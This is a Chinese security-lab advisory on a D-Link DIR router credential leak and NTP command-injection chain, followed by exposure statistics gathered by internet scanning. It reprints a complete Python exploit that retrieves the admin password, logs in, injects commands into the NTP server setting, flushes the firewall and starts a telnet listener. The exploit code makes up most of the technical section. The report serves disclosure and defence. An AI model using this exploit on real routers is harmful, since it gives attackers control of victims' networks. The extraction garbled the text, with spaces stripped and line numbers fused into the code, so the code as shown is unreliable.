路由器远程连接命令

文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第1页D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告知道创宇404实验室文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第2页1.
更新情况版本时间描述第一版2017/08/11完成D-Link路由器信息泄露和远程命令执行漏洞数据分析第二版2017/08/12完成D-Link路由器信息泄露和远程命令执行漏洞代码分析并完成文档整合2.
背景概述D-Link(即友讯网络)[1],一家生产网络硬件和软件产品的企业,主要产品有交换机、无线产品、宽带产品、网卡、路由器、网络摄像机和网络安全产品(防火墙)等.
2017年8月8号,SecuriTeam在博客公布了D-Link850L多个漏洞的漏洞细节和PoC[2],其中包括通过WAN和LAN的远程代码执行、通过WAN和LAN口的未授权信息泄露、通过LAN的root远程命令执行.
2017年8月9日,Seebug收录了该厂商旗下D-LinkDIR-850L云路由器的多个漏洞[3].
攻击者通过路由器公网入口可获取路由器后台登录凭证并执行任意代码.
知道创宇404实验室本地测试发现多款D-LinkDIR系列路由器也受到该漏洞影响.
根据ZoomEye的探测和分析,存在漏洞的D-Link路由器型号如下:DIR-868LDIR-850LDIR-610DIR-610N+DIR-860LDIR-865LDIR-600DIR-845LDIR-815DIR-300DIR-629DIR-110DIR-616DIR-852DIR-820LWDIR-456UDIR-868LD-Link供应商已经发布了补丁Firmware:1.
14B07BETA修复该漏洞[4].
文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第3页3.
漏洞分析这个漏洞由两个漏洞组成,通过第一个漏洞和第二个漏洞,可以形成完整的攻击链.
根据公布的PoC我们可以分析漏洞的成因.
下面是PoC的代码.
1.
#!
/usr/bin/envpython32.
#pylint:disable=C01033.
#4.
#pip3installrequestslxml5.
#6.
importhmac7.
importjson8.
importsys9.
fromurllib.
parseimporturljoin10.
fromxml.
sax.
saxutilsimportescape11.
importlxml.
etree12.
importrequests13.
14.
try:15.
requests.
packages.
urllib3.
disable_warnings(requests.
packages.
urllib3.
exceptions.
InsecureRequestWarning)16.
except:17.
pass18.
19.
TARGET=sys.
argv[1]20.
COMMAND=";".
join([21.
"iptables-F",22.
"iptables-X",23.
"iptables-tnat-F",24.
"iptables-tnat-X",25.
"iptables-tmangle-F",26.
"iptables-tmangle-X",27.
"iptables-PINPUTACCEPT",28.
"iptables-PFORWARDACCEPT",29.
"iptables-POUTPUTACCEPT",30.
"telnetd-p23090-l/bin/date"#port'Z2'31.
])32.
33.
session=requests.
Session()34.
session.
verify=False35.
36.
37.
38.
print("Getpassword.
.
.
")文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第4页39.
40.
headers={"Content-Type":"text/xml"}41.
cookies={"uid":"whatever"}42.
data="""43.
44.
45.
htdocs/webinc/getcfg/DEVICE.
ACCOUNT.
xml46.
47.
"""48.
49.
resp=session.
post(urljoin(TARGET,"/hedwig.
cgi"),headers=headers,cookies=cookies,data=data)50.
#print(resp.
text)51.
52.
#getcfg:.
.
.
53.
#hedwig:54.
#:.
.
.
55.
accdata=resp.
text[:resp.
text.
find("57.
admin_pasw=""58.
59.
tree=lxml.
etree.
fromstring(accdata)60.
accounts=tree.
xpath("/module/device/account/entry")61.
foraccinaccounts:62.
name=acc.
findtext("name","")63.
pasw=acc.
findtext("password","")64.
print("name:",name)65.
print("pass:",pasw)66.
ifname=="Admin":67.
admin_pasw=pasw68.
69.
ifnotadmin_pasw:70.
print("Adminpasswordnotfound!
")71.
sys.
exit()72.
73.
74.
75.
print("Authchallenge.
.
.
")76.
resp=session.
get(urljoin(TARGET,"/authentication.
cgi"))77.
#print(resp.
text)78.
79.
resp=json.
loads(resp.
text)80.
ifresp["status"].
lower()!
="ok":81.
print("Failed!
")82.
print(resp.
text)83.
sys.
exit()84.
85.
print("uid:",resp["uid"])86.
print("challenge:",resp["challenge"])87.
文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第5页88.
session.
cookies.
update({"uid":resp["uid"]})89.
90.
print("Authlogin.
.
.
")91.
user_name="Admin"92.
user_pasw=admin_pasw93.
94.
data={95.
"id":user_name,96.
"password":hmac.
new(user_pasw.
encode(),(user_name+resp["challenge"]).
encode(),"md5").
hexdigest().
upper()97.
}98.
resp=session.
post(urljoin(TARGET,"/authentication.
cgi"),data=data)99.
#print(resp.
text)100.
101.
resp=json.
loads(resp.
text)102.
ifresp["status"].
lower()!
="ok":103.
print("Failed!
")104.
print(resp.
text)105.
sys.
exit()106.
print("OK")107.
108.
109.
110.
data={"SERVICES":"DEVICE.
TIME"}111.
resp=session.
post(urljoin(TARGET,"/getcfg.
php"),data=data)112.
#print(resp.
text)113.
114.
tree=lxml.
etree.
fromstring(resp.
content)115.
tree.
xpath("//ntp/enable")[0].
text="1"116.
tree.
xpath("//ntp/server")[0].
text="metelesku;("+COMMAND+")&exit;"117.
tree.
xpath("//ntp6/enable")[0].
text="1"118.
119.
120.
121.
print("hedwig")122.
123.
headers={"Content-Type":"text/xml"}124.
data=lxml.
etree.
tostring(tree)125.
resp=session.
post(urljoin(TARGET,"/hedwig.
cgi"),headers=headers,data=data)126.
#print(resp.
text)127.
128.
tree=lxml.
etree.
fromstring(resp.
content)129.
result=tree.
findtext("result")130.
ifresult.
lower()!
="ok":131.
print("Failed!
")132.
print(resp.
text)133.
sys.
exit()134.
print("OK")135.
136.
文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第6页137.
138.
print("pigwidgeon")139.
140.
data={"ACTIONS":"SETCFG,ACTIVATE"}141.
resp=session.
post(urljoin(TARGET,"/pigwidgeon.
cgi"),data=data)142.
#print(resp.
text)143.
144.
tree=lxml.
etree.
fromstring(resp.
content)145.
result=tree.
findtext("result")146.
ifresult.
lower()!
="ok":147.
print("Failed!
")148.
print(resp.
text)149.
sys.
exit()150.
print("OK")hedwig.
cgi会调用fatlady.
php来应用设置加载配置.
这里我们可以通过设置service来加载任何php后缀的文件.
/htdocs/webinc/fatlady.
php这里我们可以通过加载配置文件来列出用户账户的口令.
/htdocs/webinc/getcfg/DEVICE.
ACCOUNT.
xml.
php文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第7页获得管理员口令后,我们可以登陆并出发第二个漏洞–NTP服务器shell命令注入通过请求getcfg.
php来加载DEVICE.
TIME.
php页面.
/htdocs/web/getcfg.
php文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第8页跟入DEVICE.
TIME.
php页面这里server变量没有任何过滤直接拼入命令通过上述两个漏洞,我们就可以无限制命令执行.
文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第9页以下为漏洞证明:成功命令执行.
4.
数据分析根据ZoomEye网络空间搜索引擎截止到2017年8月9日探测和分析的数据,对存在漏洞的D-Link路由器进行全球范围的分析,如下图所示.
文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第10页图1D-LinkDIR系列路由器信息泄露和远程命令执行漏洞全球态势上图是此次D-LinkDIR系列路由器信息泄露和远程命令执行漏洞的全球分析结果.
通过上图可以大体了解到哪些国家和地区的D-LinkDIR系列路由器设备正在面临严重的安全威胁.
存在威胁的D-LinkDIR系列路由器在较为发达的国家和地区比较多.
下图是受影响国家和地区top10的数据分析.
图2受到D-LinkDIR系列路由器漏洞威胁的国家和地区top10可以看到存在漏洞的D-LinkDIR系列路由器在新加坡、韩国和美国尤其多,已经超过1000条记录,新加坡更是超过了2000条记录.
其他国家和地区也存在不少.
如果修复不及文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第11页时,很有可能被黑客利用,破坏受威胁国家和地区的网络设施,造成重要数据泄露、网络瘫痪等不可挽回的严重后果.
下图是国内的情况.
图3国内受到D-LinkDIR系列路由器漏洞威胁的地区将目光转至国内.
中国内地可以探测到的受威胁的路由器设备并不多,仅有19条记录.
有安全隐患的D-LinkDIR系列路由器更多集中在我国台湾省和香港地区,一共有843条记录.
中国内地探测到的受此次漏洞威胁的路由器不多的原因可能有两点:1.
国内公网IP数稀少,分配给D-Link路由器过于奢侈;2.
D-LinkDIR系列路由器在国内销量不高.
接下来从路由器型号的角度进行分析.
文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第12页图4D-LinkDIR系列路由器漏洞版本分布(内圈表示型号.
外圈表示内圈对应型号的各个固件版本)可以看到路由器型号中DIR-868L与DIR-850L受影响比较严重,DIR-868L占了大约31.
66%,而DIR-850L大约占了21.
67%.
从固件版本来分析,DIR-868L的1.
03SHC、1.
09版本固件受影响数量多,分别占比7.
03%、5.
24%,DIR-850L的1.
15固件版本受影响数量较多,占比5.
22%,DIR-610的1.
01占比8.
11%,以及DIR-601N+的1.
00版本的固件占比7.
15%,以上受影响的固件版本占比均超过5%.
下图是受影响路由器型号详细的数据分析.
图5受威胁的路由器型号分布受漏洞威胁的路由器型号集中在DIR-868L、DIR-850L这两个型号上,共有5909条记录.
从图表中同样可以看出存在漏洞的路由器型号和固件版本影响范围之广.
下面从路由器连接端口的统计数据进行分析.
端口数量808068418026238846410802638181115808185888874999922208021900015图6路由器登陆端口top10分布文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第13页从端口上来分析,路由器登陆入口大多集中在常见的8080和80端口.
开在其他端口的情况也有很多,端口分布广泛.
5.
总结这次D-LinkDIR系列路由器远程命令执行漏洞是通过两个漏洞的配合:首先利用信息泄露获得账号及口令,然后利用NTP的漏洞执行任意命令.
此次D-LinkDIR系列路由器漏洞危害十分严重.
黑客如果拿下路由器就相当于获得了该网络的控制权.
所以请相关人员及时打上补丁,或者联系专业人员处理.
通过ZoomEye的全球数据分析可以看到,此次漏洞影响十分广泛,牵扯到全球很多国家和地区.
飞速发展的物联网给我们带来便利的同时,危险也悄然而至.
云路由让我们可以方便地控制远在天边的设备.
但与此同时,不怀好意之人也在觊觎你暴露在网络上的私有财产.
所以我们在享受网络的同时,也需要时刻注意网络安全维护.
6.
相关链接[1]D-Link官网http://us.
dlink.
com[2]漏洞详情及PoChttps://blogs.
securiteam.
com/index.
php/archives/3364[3]SeeBug收录https://www.
seebug.
org/vuldb/ssvid-96333[4]官方补丁http://support.
dlink.
com/ProductInfo.
aspxm=DIR-850L